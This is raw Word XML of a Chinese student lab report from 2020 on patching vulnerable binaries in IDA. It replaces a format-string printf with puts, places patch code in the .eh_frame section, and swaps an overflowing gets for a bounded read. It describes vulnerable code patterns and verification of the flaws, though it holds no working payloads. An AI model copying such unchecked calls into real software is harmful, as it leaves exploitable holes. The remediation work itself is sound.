          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果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如图4.2。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1269365"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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图4.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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寻找put地址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</w:rPr>
        <w:t>使用ida</w:t>
      </w:r>
      <w:r>
        <w:t>打开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译好的文件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奇怪的是用32位打不开，只能使用64位的ida。但是我自己编译的是可以使用32位的ida打开，实验中使用的是我自己编译的文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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</w:rPr>
        <w:t>首先找到puts的地址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我找到的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>选中调用printf指令的语句，通过鼠标右键或Ctrl+Alt+K快捷键调用IDA插件Keypatch，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>其中得到puts的地址是0x080483B0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="905510"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890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图4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w: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修改代码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先在export中找到main函数，在这里面有puts和printf函数，我们要做的就是将printf修改成puts，如图4.4。这时，我们将右键放在printf上，按下ctrl+alt+K，就会出现patcher的界面，我们要对assembly中的值进行修改，将call _printf改成call _puts，但是不能直接使用_puts，而是使用在上一步找到的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="3458845"/>
            <wp:effectExtent l="0" t="0" r="3175" b="63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图4.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/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修改之后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如图4.5，4.6。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="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b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图4.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1481455"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12065"/>
            <wp:docPr id="6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图4.6</w:t>
      </w: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</w:rPr>
        <w:t>保存之后，可以正确地执行这个程序，漏洞已经修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang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5052060" cy="487680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="6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图4.7</w:t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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在.eh_frame段插入补丁代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞源码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1777365"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="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图4.8</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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漏洞验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="956310"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810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图4.9</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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Ida分析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将已经编译好的执行文件拖出来，用ida进行分析。注意到两个printf函数，由于在左侧列表里没有put函数，所以不能用实验1的方法来解决。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想到可以修改存在漏洞的printf函数调用，修改后的函数调用可以写入程序的.eh_frame段，方法如下：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模仿scanf函数的调用写出补丁代码：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 rsi, rdi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 rdi, "%s"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 _printf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774190"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890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图4.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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查看printf函数的地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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这已经熟能生巧，找到地址为0x08048370。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115060"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270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图4.11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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查看程序的.eh_frame段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>寻找可以写入补丁代码的空间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然后打算在0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>080485E9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-0x080485FC这段空间进行修改。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2907665"/>
            <wp:effectExtent l="0" t="0" r="635" b="317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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图4.12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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修改printf为跳转指令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3611880" cy="3406140"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620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图4.13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5105400" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="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图4.14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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修改.eh_frame段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后填入设计的指令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mov rsi, rdi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lea rdi, "%s"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x08048370</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3919855"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065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图4.15</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4259580" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="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图4.16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课后作业</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞程序输入c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如图4.17所示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：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4752340" cy="1494790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="139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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图4.17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码如下：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3390265" cy="1637665"/>
            <wp:effectExtent l="0" t="0" r="825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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图4.18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buf为1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节长的数组，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>write中输</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入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个字节，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以会产生溢出。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，补丁1：将传递给read和write的第三个参数都改为1</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h。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3352165" cy="152336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b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>图4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9</w:t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</w:rPr>
        <w:t>更正之后已经不会出现上面显示的异常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。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4876165" cy="1323340"/>
            <wp:effectExtent l="0" t="0" r="635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、</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>图4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后是对于gets函数的补丁，因为gets没有对长度进行检查，因此会有溢出问题。这里选择9</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a作为填充指令的地址。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3234055" cy="2055495"/>
            <wp:effectExtent l="0" t="0" r="12065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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>图4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定read函数的地址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4218940" cy="885190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="139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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>图4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>22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2609215" cy="1266190"/>
            <wp:effectExtent l="0" t="0" r="12065" b="139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b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>图4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以发现调用read之前，应该将读取长度放入edx，buf地址放入rsi，然后将设备号放入edi。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里注意到，在调用gets之前，原来的程序已经把buf地址放入了rsi，因此只需要改变edi和edx。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2647315" cy="1056640"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1016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</w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后注意到返回地址为7</w:t>
      </w:r>
      <w:r>
        <w:t>95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，于是直接填充mov</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edi，0；mov</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>edx，1</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h；call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>0620</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；jmp </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>0795</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>补丁之后的程序：可以看到只读入1</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节。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1400175"/>
            <wp:effectExtent l="0" t="0" r="1397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</w:rPr>
        <w:t>图4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr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54" w:name="_Toc45279769"/>
      <w:bookmarkStart w:id="55" w:name="_Toc1172"/>
      <w:bookmarkStart w:id="56" w:name="_Toc9534"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验问题分析与总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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以前也写过游戏补丁，不过都是txt修改、源码修改之类的事情，在这次实验中我体会到了如何利用ida直接修改，知识面也得到了扩展。在这次实验过程唯一遇上的疑惑是ida文件的保存，因为指导书没说，而尝试过直接保存，但是保存的是idb文件，后来才知道Edit/Patch program/Apply patches to input file保存修改后的文。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="411" w:after="205"/>
        <w:ind w:left="567" w:leftChars="0" w:hanging="567" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc1290"/>
      <w:bookmarkStart w:id="58" w:name="_Toc45279770"/>
      <w:bookmarkStart w:id="59" w:name="_Toc23490"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建议与意见</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无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5A4FEE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AE5A4FE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F799C3B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BF799C3B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86C121C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F86C121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FF2677C7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FF2677C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6D376DE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D376DE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">
    <w:nsid w:val="70BCD377"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="70BCD37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737279"/>
    <w:rsid w:val="05A04A98"/>
    <w:rsid w:val="1107555E"/>
    <w:rsid w:val="16132651"/>
    <w:rsid w:val="19414ED9"/>
    <w:rsid w:val="1C4E5487"/>
    <w:rsid w:val="1CDF0B2C"/>
    <w:rsid w:val="2F6C46A8"/>
    <w:rsid w:val="2F7B11AC"/>
    <w:rsid w:val="324B5EB9"/>
    <w:rsid w:val="36737279"/>
    <w:rsid w:val="37F3516A"/>
    <w:rsid w:val="3E730074"/>
    <w:rsid w:val="40E2577F"/>
    <w:rsid w:val="422D2EA1"/>
    <w:rsid w:val="44CA5089"/>
    <w:rsid w:val="479B40D2"/>
    <w:rsid w:val="4A432B7C"/>
    <w:rsid w:val="4ADB5248"/>
    <w:rsid w:val="56803147"/>
    <w:rsid w:val="5AAC66C4"/>
    <w:rsid w:val="5C8F6CF2"/>
    <w:rsid w:val="64FF36C7"/>
    <w:rsid w:val="67AF3179"/>
    <w:rsid w:val="74FD60E9"/>
    <w:rsid w:val="78C45156"/>
    <w:rsid w:val="79096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topLinePunct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ind w:left="432" w:hanging="432"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="44"/>
      <w:sz w:val="36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 w:cs="Times New Roman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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:jc w:val="left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2">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:topLinePunct w:val="0"/>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:r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2020-07-11T01:54:00Z</dcterms:created>
  <dc:creator>失去的沉寂</dc:creator>
  <cp:lastModifiedBy>失去的沉寂</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-14T10:12:17Z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